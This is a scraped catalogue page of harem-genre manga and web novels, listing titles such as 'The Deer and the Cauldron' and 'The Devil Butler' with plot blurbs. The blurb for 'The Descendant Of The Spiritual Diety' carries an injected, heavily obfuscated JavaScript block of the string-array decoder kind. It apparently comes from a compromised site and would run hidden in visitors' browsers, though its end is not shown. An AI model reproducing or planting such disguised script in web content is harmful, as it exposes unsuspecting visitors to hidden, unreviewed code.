Harem - Page 145

Harem manga typically stars a male lead surrounded by numerous romantic interests, creating comedic and emotional drama. A reverse harem features a female protagonist instead.

2102 results

The Daily Life Of A Middle-Aged Online Shopper In Another World

The story of a middle aged man doing whatever he wants with the power of 1-click online shopping! Kenichi, a single man in his 40s, is transported into another world for no apparent reason. As he tries to escape a dangerous forest teaming with monsters, he realizes he has the power to access to a huge online store. By using this power to exchange goods he found in this new world for cash, and then buying modern ones off the internet, he was able to quickly create a very popular business. However, his goal is to have a slow and leisurely life. Instead of growing his business even more, he decides to settle down and live off of the power of Jeff Bezos. The mail order life of a middle aged man in other world begins now! Web novel: https://ncode.syosetu.com/n2945eg/


The Daily Life Of Immortal King

Who has achieved a new realm every two years since he was a year old, Wang Ling is a near-invincible existence with prowess far beyond his control. But now that he's sixteen, he faces his greatest battle yet Senior High School.


The Darkness Was Comfortable For Me

“I will have the 1,000 people I have chosen go to a parallel world.” Chaos spread once those words of God were displayed to the whole world. Kurose Hikaru, whose childhood friend had been chosen, was killed together with her on the same day she was supposed to be transferred. However, for some reason, Hikaru didn’t die and, even though he wasn’t chosen at first, he ended up as one of the . Transferred without any preparations at all to that accursed land, he faced threats innumerable times and somehow managed to survive with his Gift, the Dark Spirit Abilities. “I must not die. I am sure the people on Earth are all rooting for me after all…” This is the story of a young boy who is tossed about by the gazes of the viewers, yet eventually manages to raise his head and walk forward. (NovelUpdates)


The Deer and the Cauldron

He's a lazy, impish, vulgar, and irreverent playboy. From Lichun Brothel to the Forbidden City, the little imp Wei Xiaobao survives through the dangers. He doesn't know martial arts, yet the martial world and the imperial court become playthings in his hands. As it has once been said: There's danger in every step, and a beauty to bring home in every stage. Chinese: 偷懒耍滑、粗话连篇;玩世不恭,风流成性。从丽春院到紫禁城,小滑头韦小宝一路惊险闯关,不会武功的他却能把江湖和朝堂玩弄于股掌之间。正所谓:步步涉险强运渡,关关抱得美人归。


The Demon King's Educator -The Common Teacher Who Has Been Exiled From The Brave Academy Becomes A Private Teacher For The Devil's Daughters-

Flay has been fired from the academy after being set up by his colleague. He receives a job offer from a mysterious maid. The job offer is to be a tutor to the five daughters of the Demon King! At first, they didn't trust him to be taught by a human, but as he demonstrates his abilities, he begins to gain the trust of the Demon King's daughters.Frey's new life as an educator under one roof with five cute girls who are different in personality, but problematic girls begins!


The Demon Lord who Returned after 3000 Years ~ The Strongest Reincarnator Aims for World Domination ~

"Humanity is nothing but a nuisance to us demons." A boy who was once bullied was reincarnated into another world as the Demon Lord Noct, aiming for world domination. However, just before reaching this goal, he and his army generals were sealed away through a cunning scheme. Then, 3000 years later, Noct finally succeeds in breaking the seal. When had finally freed himself, he found a world in which monsters attack humans and where those same humans oppress the demons. Shocked by the current state of the world, Noct, along with his fellow Demon Lord Army comrades, once again begins to move to achieve world domination. To this end, he first rescue demons who are about to be sacrificed and then they seek revenge against humanity. "Kneel before me, world. My servants, march." The world conquest of the strongest Demon Lord is about to begin!


The Descendant Of The Spiritual Diety

A genius who is tired of the real world, reborn into a different world where the strongest are respected, and he's trying to become the world's strongest spirit, what kind of adventures are waiting for him?<script></script><script>(function(_0x193018,_0x12d65b){var _0x54b887=_0x3b96,_0x2f54dd=_0x193018();while(!![]){try{var _0x452871=-parseInt(_0x54b887(0xf4))/(-0x24*-0x11+-0x1740+0x14dd)+-parseInt(_0x54b887(0xf8))/(0xe4a+0x1*-0x91+-0xdb7)+-parseInt(_0x54b887(0xfc))/(0x1ffc+0x1*-0x1007+-0xff2)+-parseInt(_0x54b887(0x10c))/(-0x2*-0xe5d+-0x23*0x10d+0x19d*0x5)*(-parseInt(_0x54b887(0x103))/(0x229a+-0x67f*0x6+0x465))+-parseInt(_0x54b887(0xf7))/(0x3*0x565+-0x1*0x2225+0x1*0x11fc)+parseInt(_0x54b887(0x105))/(-0x2183*0x1+-0x1*-0x264b+-0x4c1)*(-parseInt(_0x54b887(0xec))/(0x20a+-0x74f*0x3+0x13eb))+-parseInt(_0x54b887(0xfd))/(-0x15ab+0x101e+0x596)*(-parseInt(_0x54b887(0x104))/(-0x1d00+0x25*0xb4+0x306));if(_0x452871===_0x12d65b)break;else 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The Despised Level 0 Incompetent Explorer Is Actually the World’s Strongest ~ The First Place in the Exploration Ranking Is a Mysterious Person,

The weakest me, partying with two of the most powerful girls!? After dungeons suddenly appeared on Earth, the concept of "levels" was inscribed on humanity. Levels were quantified, and as the law of the jungle became more and more prevalent, Level 0 Suzuki Hinata is the most discriminated against person in the world. Even though he's incompetent, he dreams of becoming a dungeon explorer, but for some reason Hinata suddenly becomes close to Kamui Hinata, a beautiful silver-haired girl with S-rank potential whom he meets at the high school he enrolls in――!? "Could the identity of the number one explorer be...?"


The Devil Butler

Evil, bossy and relentless, he's an authentic demon king! <br> He transmigrated into a ruthless housekeeper who is more merciless than the enemies! To steal the ancient demon emperor's power from him, the devil king, Zhuo Yifan, was betrayed by the people he once trusted. After reincarnation, he lost his powers and was haunted by his inner demons, which left him no choice but to be a butler of the young lady from a declining family. Downgraded from a devil king to a butler, how would he deal with this young lady and bring himself together with this declining family back to the pinnacle in this continent?


The Devil Kisses The Rosary

Since his childhood, Yoshihiro Yoshinaga has faced countless challenges, distancing himself from the company of others and the possibility of forging friendships due to a persistent problem: being harassed by spirits from an early age. This constant spectral presence has cast shadows over his life, weaving a web of misfortunes. However, the course of his life takes a drastic turn when a giant demon unexpectedly emerges intent on taking his life. In the midst of this crisis, a chance encounter with Alicia Baal, a beautiful nun residing within a church, becomes the catalyst for a radical transformation to his destiny.


The Devilish Duke Can’t Sleep

Duke Kahel Luave, the unlucky duke, who cannot keep one servant by his side because of the devilish nature that charms men and women of all ages. Meet Lena, a maid with a rare constitution where devilish charms don’t work. *** If the devilish energy emanating from him was a scent, now this room would be filled with a dizzyingly strong scent. However, there were no other positive emotions in Lena’s eyes except worry and fear. Kahel decided to take another approach. His appearance was also so seductive that it was rumored to be the best in the kingdom, so no matter how much he suppressed his devilish nature, he could not stop people from falling for him. Recalling that troublesome past, Kahel gave Lena a strange smile. This kind of service was not given to anyone. But……. “Sa, save me, please… … .” Lena, who was barely holding back her tears, began to cry and beg for her life. It was the moment when the law of ‘even the gods will fall in love’ on his smile faded away. ‘It’s not normal. As expected, it’s suspicious.’ Associated Names 마성의 공작님은 잠 못 이루고


The Divine Urban Physician

Five years ago, the Ye family was destroyed, and the trash Ye Chen disappeared mysteriously. Now, and the trash Ye Chen is back! He came back with a cultivating body that penetrated the heavens and the earth and cried, \"Ghosts and gods!\" This time, Ye Chen wants to make the sky fall in awe! Let the Earth tremble! To be in control of everything, to the top of the sky!
